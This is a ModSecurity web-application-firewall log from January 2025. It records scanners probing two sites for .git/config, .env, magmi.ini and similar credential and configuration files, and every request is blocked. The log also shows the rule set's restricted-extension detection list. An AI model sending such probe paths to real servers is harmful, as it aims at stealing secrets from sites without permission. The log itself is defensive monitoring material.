[Wed Jan 22 11:11:42.245976 2025] [:error] [pid 634953] [client 13.201.16.232:46702] [client 13.201.16.232] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z5DEXlXiTh4VoSbNunGpXwAAAAk"]
[Wed Jan 22 11:11:42.246988 2025] [:error] [pid 634953] [client 13.201.16.232:46702] [client 13.201.16.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z5DEXlXiTh4VoSbNunGpXwAAAAk"]
[Wed Jan 22 11:11:42.247512 2025] [:error] [pid 634953] [client 13.201.16.232:46702] [client 13.201.16.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z5DEXlXiTh4VoSbNunGpXwAAAAk"]
[Wed Jan 22 12:57:56.443863 2025] [:error] [pid 634938] [client 185.246.189.156:53274] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/magmi/conf/magmi.ini"] [unique_id "Z5DdRGkJLaRTmFx2uF6z3QAAAAQ"]
[Wed Jan 22 12:57:56.444886 2025] [:error] [pid 634938] [client 185.246.189.156:53274] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/magmi/conf/magmi.ini"] [unique_id "Z5DdRGkJLaRTmFx2uF6z3QAAAAQ"]
[Wed Jan 22 12:57:56.445320 2025] [:error] [pid 634938] [client 185.246.189.156:53274] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/magmi/conf/magmi.ini"] [unique_id "Z5DdRGkJLaRTmFx2uF6z3QAAAAQ"]
[Wed Jan 22 12:57:57.696068 2025] [:error] [pid 634953] [client 185.246.189.156:53290] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/pub/magmi/conf/magmi.ini"] [unique_id "Z5DdRVXiTh4VoSbNunGpYwAAAAk"]
[Wed Jan 22 12:57:57.697021 2025] [:error] [pid 634953] [client 185.246.189.156:53290] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/pub/magmi/conf/magmi.ini"] [unique_id "Z5DdRVXiTh4VoSbNunGpYwAAAAk"]
[Wed Jan 22 12:57:57.756372 2025] [:error] [pid 634953] [client 185.246.189.156:53290] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/pub/errors/404.php"] [unique_id "Z5DdRVXiTh4VoSbNunGpYwAAAAk"]
[Wed Jan 22 12:57:59.447156 2025] [:error] [pid 634913] [client 185.246.189.156:53302] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/plugin/magmi/conf/magmi.ini"] [unique_id "Z5DdRxWouArDQske5KChOAAAAAA"]
[Wed Jan 22 12:57:59.448221 2025] [:error] [pid 634913] [client 185.246.189.156:53302] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/plugin/magmi/conf/magmi.ini"] [unique_id "Z5DdRxWouArDQske5KChOAAAAAA"]
[Wed Jan 22 12:57:59.448673 2025] [:error] [pid 634913] [client 185.246.189.156:53302] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/plugin/magmi/conf/magmi.ini"] [unique_id "Z5DdRxWouArDQske5KChOAAAAAA"]
[Wed Jan 22 18:29:52.107456 2025] [:error] [pid 642478] [client 64.95.11.173:58942] [client 64.95.11.173] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5ErEIfh3zT1dQTqJgEe6QAAABg"]
[Wed Jan 22 18:29:52.108352 2025] [:error] [pid 642478] [client 64.95.11.173:58942] [client 64.95.11.173] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5ErEIfh3zT1dQTqJgEe6QAAABg"]
[Wed Jan 22 18:29:52.108847 2025] [:error] [pid 642478] [client 64.95.11.173:58942] [client 64.95.11.173] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5ErEIfh3zT1dQTqJgEe6QAAABg"]
[Wed Jan 22 18:29:52.265602 2025] [:error] [pid 642459] [client 64.95.11.173:58944] [client 64.95.11.173] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z5ErEHlCFHPQv38rFsXuxQAAAAY"]
[Wed Jan 22 18:29:52.266321 2025] [:error] [pid 642459] [client 64.95.11.173:58944] [client 64.95.11.173] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z5ErEHlCFHPQv38rFsXuxQAAAAY"]
[Wed Jan 22 18:29:52.266782 2025] [:error] [pid 642459] [client 64.95.11.173:58944] [client 64.95.11.173] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z5ErEHlCFHPQv38rFsXuxQAAAAY"]
[Thu Jan 23 17:34:27.838447 2025] [:error] [pid 657136] [client 45.148.10.86:54250] [client 45.148.10.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z5Jvk1aYDDw5ukJuYG-kwAAAAAc"]
[Thu Jan 23 17:34:27.839126 2025] [:error] [pid 657136] [client 45.148.10.86:54250] [client 45.148.10.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z5Jvk1aYDDw5ukJuYG-kwAAAAAc"]
[Thu Jan 23 17:34:27.839586 2025] [:error] [pid 657136] [client 45.148.10.86:54250] [client 45.148.10.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z5Jvk1aYDDw5ukJuYG-kwAAAAAc"]
[Fri Jan 24 14:33:32.291370 2025] [:error] [pid 678321] [client 185.246.189.156:42864] [client 185.246.189.156] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z5OWrF1GE5TvEQQOyrYEVgAAAAE"]
[Fri Jan 24 14:33:32.292007 2025] [:error] [pid 678321] [client 185.246.189.156:42864] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z5OWrF1GE5TvEQQOyrYEVgAAAAE"]
[Fri Jan 24 14:33:32.292476 2025] [:error] [pid 678321] [client 185.246.189.156:42864] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z5OWrF1GE5TvEQQOyrYEVgAAAAE"]
[Fri Jan 24 14:33:33.599876 2025] [:error] [pid 675789] [client 185.246.189.156:42868] [client 185.246.189.156] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /compose/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/compose/.env"] [unique_id "Z5OWreyNBq4ORXaDkkudWwAAAAQ"]
[Fri Jan 24 14:33:33.600479 2025] [:error] [pid 675789] [client 185.246.189.156:42868] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/compose/.env"] [unique_id "Z5OWreyNBq4ORXaDkkudWwAAAAQ"]
[Fri Jan 24 14:33:33.600945 2025] [:error] [pid 675789] [client 185.246.189.156:42868] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/compose/.env"] [unique_id "Z5OWreyNBq4ORXaDkkudWwAAAAQ"]
[Fri Jan 24 14:33:34.942691 2025] [:error] [pid 676876] [client 185.246.189.156:42882] [client 185.246.189.156] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /script/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/script/.env"] [unique_id "Z5OWrvCWkj3eE_YNjNOEwgAAAAk"]
[Fri Jan 24 14:33:34.943391 2025] [:error] [pid 676876] [client 185.246.189.156:42882] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/script/.env"] [unique_id "Z5OWrvCWkj3eE_YNjNOEwgAAAAk"]
[Fri Jan 24 14:33:34.944018 2025] [:error] [pid 676876] [client 185.246.189.156:42882] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/script/.env"] [unique_id "Z5OWrvCWkj3eE_YNjNOEwgAAAAk"]
[Fri Jan 24 14:33:36.184505 2025] [:error] [pid 675791] [client 185.246.189.156:42892] [client 185.246.189.156] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /install/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/install/.env"] [unique_id "Z5OWsJ-gEdaP_fzUTtW9kwAAAAU"]
[Fri Jan 24 14:33:36.185061 2025] [:error] [pid 675791] [client 185.246.189.156:42892] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/install/.env"] [unique_id "Z5OWsJ-gEdaP_fzUTtW9kwAAAAU"]
[Fri Jan 24 14:33:36.185523 2025] [:error] [pid 675791] [client 185.246.189.156:42892] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/install/.env"] [unique_id "Z5OWsJ-gEdaP_fzUTtW9kwAAAAU"]
[Fri Jan 24 14:33:44.439168 2025] [:error] [pid 678321] [client 185.246.189.156:43734] [client 185.246.189.156] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "Z5OWuF1GE5TvEQQOyrYEVwAAAAE"]
[Fri Jan 24 14:33:44.439950 2025] [:error] [pid 678321] [client 185.246.189.156:43734] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "Z5OWuF1GE5TvEQQOyrYEVwAAAAE"]
[Fri Jan 24 14:33:44.440544 2025] [:error] [pid 678321] [client 185.246.189.156:43734] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "Z5OWuF1GE5TvEQQOyrYEVwAAAAE"]
[Fri Jan 24 14:34:14.103422 2025] [:error] [pid 675849] [client 185.246.189.156:36042] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.m2-installer.conf"] [unique_id "Z5OW1oMsHaJVSDKq5FmxqgAAAAY"]
[Fri Jan 24 14:34:14.104403 2025] [:error] [pid 675849] [client 185.246.189.156:36042] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.m2-installer.conf"] [unique_id "Z5OW1oMsHaJVSDKq5FmxqgAAAAY"]
